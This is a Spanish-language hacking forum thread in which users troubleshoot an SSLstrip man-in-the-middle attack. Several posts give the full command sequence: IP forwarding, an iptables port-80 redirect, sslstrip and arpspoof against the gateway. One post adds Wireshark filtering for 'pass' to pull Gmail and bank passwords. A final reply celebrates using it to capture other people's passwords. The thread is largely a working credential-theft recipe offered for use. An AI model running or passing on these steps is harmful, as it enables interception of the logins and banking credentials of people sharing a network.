elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  SSLstrip 0.9 no funciona...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SSLstrip 0.9 no funciona...  (Leído 9,028 veces)
alpha015

Desconectado Desconectado

Mensajes: 132



Ver Perfil
SSLstrip 0.9 no funciona...
« en: 28 Diciembre 2011, 00:55 am »

Buenas, en primer lugar feliz navidad. En segundo lugar quería saber si alguien puede resolverme unas dudas. Inicio en mi red sslstrip 0.9, empiezo a capturar con Wireshark y accedo a gmail, pero no logro descifrar los datos de acceso... gracias por adelantado.



En línea

ps3ps3ps3

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #1 en: 30 Diciembre 2011, 00:11 am »

Yo hago lo mismo que tu,con VirtualBox y no me captura nada.. haber si alguien nos dice algo.

Saludoss.
En línea

alpha015

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #2 en: 30 Diciembre 2011, 00:56 am »

Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:

configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT
                                 adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red

Saludos.

Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.
« Última modificación: 30 Diciembre 2011, 00:59 am por alpha015 » En línea

alpha015

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #3 en: 30 Diciembre 2011, 00:58 am »

Por cierto, ¿por qué jamones wireshark solo me captura paquetes ssdp?
En línea

ps3ps3ps3

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #4 en: 30 Diciembre 2011, 02:48 am »

Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:

configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT
                                 adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red

Saludos.

Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.
Gracias,( ya tengo VBox configurado :) )que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo:
echo 1 > /proc/sys/net/ipv4/ip_forward

En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3
y en la otra consola al contrario:
sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias
« Última modificación: 30 Diciembre 2011, 02:50 am por ps3ps3ps3 » En línea

alpha015

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #5 en: 30 Diciembre 2011, 12:48 pm »

Gracias,( ya tengo VBox configurado :) )que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo:
echo 1 > /proc/sys/net/ipv4/ip_forward

En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3
y en la otra consola al contrario:
sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias

Haber... llevas un pollo mental... lo mejor sería que utilizaras 2 ordenadores, atacante y víctima, pero si solo tienes uno pues nada. No necesitan abrir 3 consolas y mucho menos realizar 2 veces el ataque. Acuérdate además de usar la última versión de SSLstrip, la 0.9:

En la 1ª consola:
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -a -l 10000

En la 2ª consola:
sudo arpspoof -i wlan0 <puertadeenlace>

*wlan0 o la interfaz que tengas.

Dsniff no lo controlo, te recomiendo que captures con Wireshark...
Por cierto, con mi cuenta no podia redireccionar el tráfico del 80 por falta de permisos asi que lo hago desde root, no se si a ti te dejara... Un saludo.
« Última modificación: 30 Diciembre 2011, 12:50 pm por alpha015 » En línea

ps3ps3ps3

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #6 en: 30 Diciembre 2011, 13:23 pm »

Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento.

Gracias y Saludos.  :D

EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc.  :huh:

Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos.
« Última modificación: 30 Diciembre 2011, 13:50 pm por ps3ps3ps3 » En línea

alpha015

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #7 en: 30 Diciembre 2011, 20:58 pm »

Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento.

Gracias y Saludos.  :D

EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc.  :huh:

Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos.

De nada. Haber, el ataque consiste en situarse entre la víctima o víctimas y el router engañándolo y caputarando así todos los paquetes. Sólo hay que realizar un ataque y eso de ambas direcciones que dices no es más que el protocolo tcp/ip al enviar la victima una peticion y esta sea respondida.

Efectivamente Virtualbox es como si fuera un ordenador, y con respecto a Wireshark tengo que decir que es muy sencillo de usar. Yo empezé con Ettercap pero como me daba muchos problemas me pasé a Wireshark.

Es cierto que SSLstrip te crea un archivo con los datos de acceso interceptados, si los hay, no obstante, en Wireshark filtrando por "http contains pass, Pass, password, etc..." puedes facilmente encontrar las contraseñas de ibanesto o gmail por ejemplo. Te dejo un manual cojonudo:

http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo

Sé bueno, un saludo.
« Última modificación: 30 Diciembre 2011, 21:02 pm por alpha015 » En línea

Bl4ckP0i7

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: SSLstrip 0.9 no funciona...
« Respuesta #8 en: 4 Febrero 2013, 17:56 pm »

JOder tios gracias por el arpspoof a solo el router para que lleguen mas contraseñas de la gente conectada.... jijiji a hacer locuras
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
SSLSTRIP « 1 2 3 »
Hacking
BeLGaRioN 20 14,658 Último mensaje 9 Diciembre 2011, 11:33 am
por D_pit_88
Youtube se mea en Sslstrip
Hacking
beholdthe 2 3,570 Último mensaje 30 Diciembre 2011, 15:49 pm
por beholdthe
no me funciona sslstrip
Redes
daryo 0 1,908 Último mensaje 25 Agosto 2013, 19:48 pm
por daryo
SSLStrip no funciona correctamente
Hacking
sakun-ice 6 11,279 Último mensaje 25 Junio 2015, 16:32 pm
por Kaxperday
aun funciona SSLStrip
Dudas Generales
RedZer 5 3,996 Último mensaje 30 Octubre 2014, 22:29 pm
por RedZer
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines